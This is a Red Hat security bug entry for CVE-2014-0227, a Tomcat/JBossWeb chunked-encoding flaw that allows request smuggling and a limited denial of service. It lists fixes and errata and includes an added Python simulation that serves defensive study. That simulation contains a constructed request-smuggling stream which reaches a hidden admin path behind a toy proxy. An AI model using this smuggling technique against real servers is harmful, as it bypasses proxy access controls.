Bug 1109196 (CVE-2014-0227)

Summary: CVE-2014-0227 Tomcat/JBossWeb: request smuggling and limited DoS in ChunkedInputFilter
Product: [Other] Security Response
Component: vulnerability
Status: CLOSED ERRATA
Severity: medium
Priority: medium
Version: unspecified
Target Milestone: ---
Target Release: ---
Hardware: All
OS: Linux
Keywords: Security
Reporter: Arun Babu Neelicattu <aneelica>
Assignee: Red Hat Product Security <security-response-team>
CC: bdawidow, cdewolf, chazlett, darran.lofthouse, grocha, jawilson, jclere, jcoleman, jdoyle, jpallich, kconner, kejohnso, lgao, mbabacek, mjc, mweiler, myarboro, pgier, pslavice, rsvoboda, security-response-team, slaskawi, spinder, theute, tkirby, ttarrant, vtunka, weli
Fixed In Version: JBossWeb 7.4.6.Final, Tomcat 7.0.55, Tomcat 6.0.43
Doc Type: Bug Fix
Doc Text:
It was discovered that the ChunkedInputFilter in Tomcat did not fail subsequent attempts to read input after malformed chunked encoding was detected. A remote attacker could possibly use this flaw to make Tomcat process part of the request body as a new request, or cause a denial of service.
Last Closed: 2019-06-08 02:33:32 UTC
Bug Depends On: 1109208, 1109199, 1109200, 1109201, 1109202, 1109203, 1109204, 1109205, 1109206, 1109207, 1109209, 1109210, 1109211, 1109212, 1109213, 1109216, 1109217, 1109218, 1109219, 1109220, 1109221, 1109223, 1109225, 1109226, 1109227, 1109228, 1109229, 1160690, 1190821
Bug Blocks: 1082938, 1119820, 1119823, 1127901, 1181883, 1182400, 1182419, 1200191

Description Arun Babu Neelicattu 2014-06-13 12:55:29 UTC
It was discovered that the ChunkedInputFilter implementation did not fail subsequent attempts to read input early enough. A remote attacker could use this flaw to perform a denial of service attack, by streaming an unlimited quantity of data, leading to consumption of server resources.

Comment 1 Arun Babu Neelicattu 2014-06-13 12:59:54 UTC
Upstream Fix:

Tomcat: http://svn.apache.org/viewvc?view=revision&revision=1600984
JBossWeb: https://source.jboss.org/changelog/JBossWeb?cs=2455

Comment 19 Martin Prpič 2015-02-09 16:42:45 UTC
Created tomcat tracking bugs for this issue:

Affects: fedora-all [bug 1190821]

Comment 21 errata-xmlrpc 2015-02-17 22:29:11 UTC
This issue has been addressed in the following products:

  Red Hat JBoss BRMS 6.0.3

Via RHSA-2015:0235 https://rhn.redhat.com/errata/RHSA-2015-0235.html

Comment 22 errata-xmlrpc 2015-02-17 22:33:36 UTC
This issue has been addressed in the following products:

  Red Hat JBoss BPM Suite 6.0.3

Via RHSA-2015:0234 https://rhn.redhat.com/errata/RHSA-2015-0234.html

Comment 24 Fedora Update System 2015-02-23 08:02:45 UTC
tomcat-7.0.59-1.fc21 has been pushed to the Fedora 21 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 25 Tomas Hoger 2015-03-11 10:41:01 UTC
Tomcat upstream advisories (see comment 18 above) point out an additional impact: request smuggling. Tomcat may read the next request from the malformed chunked request body, rather than aborting the connection as soon as the first encoding issue is detected.

Upstream does not indicate where this may have practical impact, as Tomcat accepts multiple requests pipelined in a single connection. It seems this may have impact in deployments where Tomcat is accessed via a reverse proxy that only exposes certain paths / web applications. This may possibly allow bypass of proxy restrictions and allow access to URLs not exposed by the proxy. However, this attack would require the proxy to allow malformed requests to be passed to Tomcat.
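
The following is an added illustration of the behaviour described in the description and in comment 25; it is not code from this bug, from Tomcat or from JBossWeb. It models a chunked-body decoder on a pipelined HTTP/1.1 connection in Python, with a switch between the flawed behaviour (the malformed chunk is rejected, but the connection stays readable, so the attacker-supplied bytes that follow it are parsed as the next request) and the fixed behaviour (the first encoding error puts the connection into a permanent error state and the leftover bytes are discarded). The toy reverse proxy, the path allowlist `/public/`, the request bytes and all function names are constructed for the example; the real ChunkedInputFilter is Java and its fix is the upstream revision linked in comment 1.

```python
import re

CRLF = b"\r\n"
# chunk-size is hex; chunk extensions after ';' are stripped (simplification for the example)
CHUNK_SIZE_RE = re.compile(rb"^[0-9A-Fa-f]+$")


class MalformedChunk(Exception):
    pass


class ChunkedBodyReader:
    """Decodes one chunked request body from a connection buffer.

    fail_closed=True : any encoding error poisons the connection; every later
                       read fails and the unread bytes are dropped (fixed behaviour).
    fail_closed=False: the bad chunk raises once, but the buffer stays readable,
                       so whatever followed the bad chunk becomes the next request
                       on the connection (the CVE-2014-0227 behaviour).
    """

    def __init__(self, buf: bytes, fail_closed: bool = True):
        self.buf = buf
        self.fail_closed = fail_closed
        self.error = False

    def _read_line(self) -> bytes:
        idx = self.buf.find(CRLF)
        if idx < 0:
            raise MalformedChunk("chunk line not terminated by CRLF")
        line, self.buf = self.buf[:idx], self.buf[idx + 2:]
        return line

    def read_body(self) -> bytes:
        if self.error:
            raise MalformedChunk("connection already in error state")
        out = b""
        try:
            while True:
                size_line = self._read_line().split(b";", 1)[0].strip()
                if not CHUNK_SIZE_RE.match(size_line):
                    raise MalformedChunk("bad chunk-size %r" % size_line)
                size = int(size_line, 16)
                if size == 0:                      # last-chunk: skip trailers to the empty line
                    while self._read_line() != b"":
                        pass
                    return out
                if len(self.buf) < size + 2 or self.buf[size:size + 2] != CRLF:
                    raise MalformedChunk("chunk data not terminated by CRLF")
                out += self.buf[:size]
                self.buf = self.buf[size + 2:]
        except MalformedChunk:
            if self.fail_closed:
                self.error = True
                self.buf = b""   # never hand attacker-controlled leftovers to the next request
            raise


def parse_head(buf: bytes):
    """Split request line and headers. Returns (method, target, headers, rest) or None."""
    idx = buf.find(b"\r\n\r\n")
    if idx < 0:
        return None
    head, rest = buf[:idx], buf[idx + 4:]
    lines = head.split(CRLF)
    method, target, _version = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return method.decode(), target.decode(), headers, rest


def serve_connection(raw: bytes, fail_closed: bool = True):
    """Process every pipelined request on one connection; returns the
    (method, target, status) tuples that reached the application."""
    processed, buf, error = [], raw, False
    while buf and not error:
        parsed = parse_head(buf)
        if parsed is None:
            break
        method, target, headers, buf = parsed
        if headers.get(b"transfer-encoding") == b"chunked":
            reader = ChunkedBodyReader(buf, fail_closed)
            try:
                reader.read_body()
                processed.append((method, target, 200))
            except MalformedChunk:
                processed.append((method, target, 400))
                error = reader.error
            buf = reader.buf
        else:
            processed.append((method, target, 200))
    return processed


def proxy_forward(raw: bytes, allowed_prefix: bytes = b"/public/"):
    """Toy reverse proxy (assumption): it checks only the first request's path on the
    connection and relays the raw bytes unchanged, without validating chunked encoding."""
    parsed = parse_head(raw)
    if parsed is None or not parsed[1].encode().startswith(allowed_prefix):
        return None
    return raw


# Constructed attacker stream: a legitimate-looking POST to an exposed path whose
# chunked body goes bad at the second chunk-size line ("zz"), followed by a request
# for a path the proxy does not expose.
SMUGGLE = (
    b"POST /public/upload HTTP/1.1\r\nHost: app.example\r\nTransfer-Encoding: chunked\r\n\r\n"
    b"5\r\nhello\r\n"
    b"zz\r\n"
    b"GET /admin/status HTTP/1.1\r\nHost: app.example\r\n\r\n"
)

# Constructed well-formed stream: two pipelined requests that should both be served.
VALID = (
    b"POST /public/upload HTTP/1.1\r\nHost: app.example\r\nTransfer-Encoding: chunked\r\n\r\n"
    b"5\r\nhello\r\n0\r\n\r\n"
    b"GET /public/list HTTP/1.1\r\nHost: app.example\r\n\r\n"
)


def demo(fail_closed: bool):
    forwarded = proxy_forward(SMUGGLE)   # proxy sees only /public/upload and relays everything
    if forwarded is None:
        return []
    return serve_connection(forwarded, fail_closed)


if __name__ == "__main__":
    print("flawed:", demo(fail_closed=False))   # smuggled GET /admin/status reaches the app
    print("fixed: ", demo(fail_closed=True))    # connection poisoned after the bad chunk
```

With `fail_closed=False` the smuggled `GET /admin/status` is served behind the proxy's path restriction; with `fail_closed=True` the connection ends at the first malformed chunk and nothing after it is interpreted. The model does not reproduce the resource-consumption side of the bug, only the point at which a decoder must stop trusting the stream.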

Comment 26 errata-xmlrpc 2015-03-11 16:53:40 UTC
This issue has been addressed in the following products:

  JBoss Data Virtualization 6.1.0

Via RHSA-2015:0675 https://rhn.redhat.com/errata/RHSA-2015-0675.html

Comment 27 errata-xmlrpc 2015-03-24 21:07:00 UTC
This issue has been addressed in the following products:

  Red Hat JBoss Fuse Service Works 6.0.0

Via RHSA-2015:0720 https://rhn.redhat.com/errata/RHSA-2015-0720.html

Comment 28 errata-xmlrpc 2015-03-31 17:01:54 UTC
This issue has been addressed in the following products:

  Red Hat JBoss Data Virtualization 6.0.0

Via RHSA-2015:0765 https://rhn.redhat.com/errata/RHSA-2015-0765.html

Comment 31 errata-xmlrpc 2015-05-12 16:37:57 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 7

Via RHSA-2015:0983 https://rhn.redhat.com/errata/RHSA-2015-0983.html

Comment 33 errata-xmlrpc 2015-05-12 18:20:33 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 6

Via RHSA-2015:0991 https://rhn.redhat.com/errata/RHSA-2015-0991.html

Comment 34 errata-xmlrpc 2015-05-14 15:21:18 UTC
This issue has been addressed in the following products:

  JBoss Portal 6.2.0

Via RHSA-2015:1009 https://rhn.redhat.com/errata/RHSA-2015-1009.html